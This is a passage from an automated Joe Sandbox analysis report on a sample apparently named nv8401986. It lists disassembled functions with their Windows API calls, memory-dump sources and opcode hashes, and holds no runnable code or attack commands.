                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: c630fa0b7589807be2e33008512972c10cc34a4c8cc7cfe81dddad3a9b598ad9
                                                                                                                                                                                                          • Instruction ID: f0aaa77cdfe08d682c454385e37022b0c08908178d8291d9ee2094e266bd5c25
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c630fa0b7589807be2e33008512972c10cc34a4c8cc7cfe81dddad3a9b598ad9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8531E231A48A08DFDB10DF98DD06B9D7BA4FB18B14F1042AFE810A33C1EBB51A048B95
                                                                                                                                                                                                          Function 00467AA0 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlInitializeCriticalSection.NTDLL(0059806C), ref: 00467B0E
                                                                                                                                                                                                            • Part of subcall function 00513D5F: __onexit.LIBCMT ref: 00513D65
                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00467B2A
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlEnterCriticalSection.NTDLL(00596E38), ref: 00513993
                                                                                                                                                                                                            • Part of subcall function 00513989: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 005139C6
                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0059806C), ref: 00467B45
                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0059806C), ref: 00467B99
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlEnterCriticalSection.NTDLL(00596E38), ref: 005139DE
                                                                                                                                                                                                            • Part of subcall function 005139D3: RtlLeaveCriticalSection.NTDLL(00596E38), ref: 00513A1B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footerInitialize__onexit
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 916978925-0
                                                                                                                                                                                                          • Opcode ID: 38d00dfc6dd566cd1b84a85dcdf4aee55c0f5aa354672eb396c045367be88080
                                                                                                                                                                                                          • Instruction ID: 0c6643e11dc64c83e0cf189ea66258a100bcda4080e26380151bb26afb711d60
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38d00dfc6dd566cd1b84a85dcdf4aee55c0f5aa354672eb396c045367be88080
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831B471D44209DFDB00DF68D80A79DBBB0FB59B28F10436BE815A7390EBB55A48CB91
                                                                                                                                                                                                          Function 0052510E Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,?,Function_00124F3B,00000000,00000004,00000000), ref: 0052515A
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00525166
                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0052516D
                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000000), ref: 0052518B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 173952441-0
                                                                                                                                                                                                          • Opcode ID: 4faed2b95914eae341e10d3883a5b65310008893017a771d142cac3827333175
                                                                                                                                                                                                          • Instruction ID: c444432953ebe7e7cd61986f7a66130bb8c5372ded9c9a2013f33e782fa49922
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4faed2b95914eae341e10d3883a5b65310008893017a771d142cac3827333175
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E01D236414A25BBE7206BA8EC0DBAF7F68FF83731F100215F924821D0EB718955C7A0
                                                                                                                                                                                                          Function 00532D83 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00532D2A,?,00000000,00000000,00000000,?,00533056,00000006,FlsSetValue), ref: 00532DB5
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00532D2A,?,00000000,00000000,00000000,?,00533056,00000006,FlsSetValue,00569DE8,FlsSetValue,00000000,00000364,?,005347D5), ref: 00532DC1
                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00532D2A,?,00000000,00000000,00000000,?,00533056,00000006,FlsSetValue,00569DE8,FlsSetValue,00000000), ref: 00532DCF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                                          • Opcode ID: 6f070ff89470435c7b0e02c0574fb90aaf4e4717e38a2bfc9506e57acc348537
                                                                                                                                                                                                          • Instruction ID: f9af924201c624cd2ad27dc0d8ddca473f9fad4d642c7b0aa0b403c0303e8667
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f070ff89470435c7b0e02c0574fb90aaf4e4717e38a2bfc9506e57acc348537
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A01F23A625A22ABC7214B6DEC44A967F98FF16BA5F210E20F906D3140CB30D807D7E0
                                                                                                                                                                                                          Function 00408EE0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004035B0: std::locale::_Init.LIBCPMT ref: 00403619
                                                                                                                                                                                                          • std::locale::_Init.LIBCPMT ref: 00408FF1
                                                                                                                                                                                                            • Part of subcall function 00403470: __CxxThrowException@8.LIBVCRUNTIME ref: 0040349D
                                                                                                                                                                                                            • Part of subcall function 00403470: __CxxThrowException@8.LIBVCRUNTIME ref: 004034E2
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::_Lockit.LIBCPMT ref: 0040D10C
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::_Lockit.LIBCPMT ref: 0040D12E
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D156
                                                                                                                                                                                                            • Part of subcall function 0040D0D0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040D2A1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Lockitstd::_$Exception@8InitLockit::_Lockit::~_Throwstd::locale::_
                                                                                                                                                                                                          • String ID: )@$1@
                                                                                                                                                                                                          • API String ID: 3818760586-2840543281
                                                                                                                                                                                                          • Opcode ID: 05c3d88d774c0601ec1489d5b66244bffc8f810f3dfea1b3fe9467d8304ca25c
                                                                                                                                                                                                          • Instruction ID: deae8829857c0e56a224919e77ac2c91d45f5c733d29db3c0dde497fb81eccab
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05c3d88d774c0601ec1489d5b66244bffc8f810f3dfea1b3fe9467d8304ca25c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FB1D7B4A00205DFDB10CF59C994B9ABBF4FF09314F1581AAE805AF392D77A9945CF90
                                                                                                                                                                                                          Function 0049F670 Relevance: 4.7, APIs: 3, Instructions: 167COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(004906C4,?,00000104,75920E50,0041B390,005733F8), ref: 0049F6C6
                                                                                                                                                                                                          • LoadTypeLib.OLEAUT32(?,?), ref: 0049F6E4
                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0049F838
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFreeLoadModuleNameStringType
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4083945026-0
                                                                                                                                                                                                          • Opcode ID: 0be6a6196ee86ef7792afd48c43d55f1b4dd9491417c7649c491e8f39f1a7ee6
                                                                                                                                                                                                          • Instruction ID: 4dda26bcd544fd14441eb4dfafd73d441e2e82be9e16db2a2d0ac3b5ed7e4b41
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0be6a6196ee86ef7792afd48c43d55f1b4dd9491417c7649c491e8f39f1a7ee6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58514D71A012199BDF20EF64CC89BDAB7B8FF48304F1045EAE509E7250D738AA85CF54
                                                                                                                                                                                                          Function 004059D0 Relevance: 4.6, APIs: 3, Instructions: 144registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.KERNEL32(80000001,?,00000000,00020019,?,EFE0703F), ref: 00405AB4
                                                                                                                                                                                                          • RegQueryValueExW.KERNEL32(00000000,00740053,00000000,00000001,?,00000104), ref: 00405B35
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00405B41
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3677997916-0
                                                                                                                                                                                                          • Opcode ID: f038b0d0d1d9df09a0f5e827b8835f1d83705937ae371ba6b398fa1805ed6815
                                                                                                                                                                                                          • Instruction ID: e3be2bc35274d82d92bcf34f10f9c755e652f5340fe98d5d77b14e089490af26
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f038b0d0d1d9df09a0f5e827b8835f1d83705937ae371ba6b398fa1805ed6815
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E612FB4D01258DFEB60DF90C84CBDEBBB5FB04308F1042A9D519A7291DBB55A88CF94
                                                                                                                                                                                                          Function 004717A0 Relevance: 4.6, APIs: 3, Instructions: 111COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • std::locale::facet::facet.LIBCPMTD ref: 00471814
                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00471844
                                                                                                                                                                                                          • Concurrency::details::_AsyncTaskCollection::~_AsyncTaskCollection.LIBCONCRTD ref: 004718D9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AsyncTask$Affinity::operator!=CollectionCollection::~_Concurrency::details::Concurrency::details::_Hardwarestd::locale::facet::facet
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1231514646-0
                                                                                                                                                                                                          • Opcode ID: edf22b209188365b0819a156ff723ef45c777f0dbf5a45d6a3f6d2954fbe76f5
                                                                                                                                                                                                          • Instruction ID: c2c6776b136ad66135f42c80b88a170ea071435d5b95d5d81849948d6e5a690b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: edf22b209188365b0819a156ff723ef45c777f0dbf5a45d6a3f6d2954fbe76f5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA4120B1D10109DFCB08EF99D951AEFB7B5FF58314F10822EE016A7291DB746A05CBA4
                                                                                                                                                                                                          Function 00532017 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0051230A,?,00531F35,0051230A,0058C980,0000000C), ref: 0053206D
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00531F35,0051230A,0058C980,0000000C), ref: 00532077
                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 005320A2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2583163307-0
                                                                                                                                                                                                          • Opcode ID: 13ae21866eec027287e8fd717e88ae60345f14550dcc7dc748287f6e09b7c525
                                                                                                                                                                                                          • Instruction ID: 47caa73e1590b659dd4f9663fb2b165c2b97d351a8fc7314c210e6aca6a1a932
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13ae21866eec027287e8fd717e88ae60345f14550dcc7dc748287f6e09b7c525
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F701CE32A099141AE63D1338984DB7D2F49BBCA734F25021AF824C71D2DE619C88C340
                                                                                                                                                                                                          Function 0046EE5F Relevance: 4.5, APIs: 3, Instructions: 37memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,0046F4FE,?,00000000), ref: 0046EE70
                                                                                                                                                                                                          • VirtualProtect.KERNEL32(00000000,00010000,00000020,?,00000000,?,?,?,0046F4FE,?,00000000), ref: 0046EE90
                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,00000000,00010000,?,?,?,0046F4FE,?,00000000), ref: 0046EE99
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3733156554-0
                                                                                                                                                                                                          • Opcode ID: e42dd9cc3488d5eb93c8c6ae313304d91fa69bfe922df8b7f77ec369c40feb65
                                                                                                                                                                                                          • Instruction ID: 9c3dcaad3cfe3b9c39b19e3d88d40107698d6e769a75559a83e5dc1fd974a590
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e42dd9cc3488d5eb93c8c6ae313304d91fa69bfe922df8b7f77ec369c40feb65
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F0B435501218FBD7118B19EC489FF7BACEB5DB64B410059F801A3200DB24AD05D6A5
                                                                                                                                                                                                          Function 0048D960 Relevance: 4.5, APIs: 3, Instructions: 34threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00597AA4,000000FF,00000000), ref: 0048D970
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00597AA4,00000001), ref: 0048D994
                                                                                                                                                                                                          • SwitchToThread.KERNEL32(?,0048EAE9,?,EFE0703F,00000000,00000000), ref: 0048D9B3
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked$CompareSwitchThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2506754736-0
                                                                                                                                                                                                          • Opcode ID: 1b6c5e33c27b44e036081366c5a8c5f6940096632c2534a92b8a6942e2615916
                                                                                                                                                                                                          • Instruction ID: b632a507df4005fee82b027099c33a1518325281227d2c2dbaa3702ee88f6ab3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6c5e33c27b44e036081366c5a8c5f6940096632c2534a92b8a6942e2615916
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F046349683099AD7206B1CED01BEE3714AF38314F014173F9081A5B1D6B025D4E754
                                                                                                                                                                                                          Function 0052506E Relevance: 4.5, APIs: 3, Instructions: 31threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00534787: GetLastError.KERNEL32(?,?,?,0051EAA1,005349B8,?,00534731,00000001,00000364,?,00524F60,0058C738,00000010), ref: 0053478C
                                                                                                                                                                                                            • Part of subcall function 00534787: _free.LIBCMT ref: 005347C1
                                                                                                                                                                                                            • Part of subcall function 00534787: SetLastError.KERNEL32(00000000), ref: 005347F5
                                                                                                                                                                                                          • RtlExitUserThread.NTDLL(?,?,?,0052522C,?,?,00524F9A,00000000), ref: 00525080
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,0052522C,?,?,00524F9A,00000000), ref: 005250A8
                                                                                                                                                                                                          • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0052522C,?,?,00524F9A,00000000), ref: 005250BE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273561569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273618691.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273920657.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.3273964293.00000000005A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_nv8401986_110422.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorExitLastThread$CloseFreeHandleLibraryUser_free
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1765993807-0
                                                                                                                                                                                                          • Opcode ID: 5a32ee2575200aba5aaaebdef74a5c03f58d445708c8295311f2c262f9a7823d
                                                                                                                                                                                                          • Instruction ID: bcf945499e7d90629ba33448647c0ed1273f20173f71fa737dc9f3bf272e0d07
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a32ee2575200aba5aaaebdef74a5c03f58d445708c8295311f2c262f9a7823d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36F05E39400A246BDB315B79EC0CA9A7F98BF03764F094B10B865C25E0F770EC45C6D0
                                                                                                                                                                                                          Function 00476120 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • std::_Container_base12::~_Container_base12.LIBCPMTD ref: 004761AB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • A valid JSON document must be either an array or an object value., xrefs: 00476266
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.3273618691.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
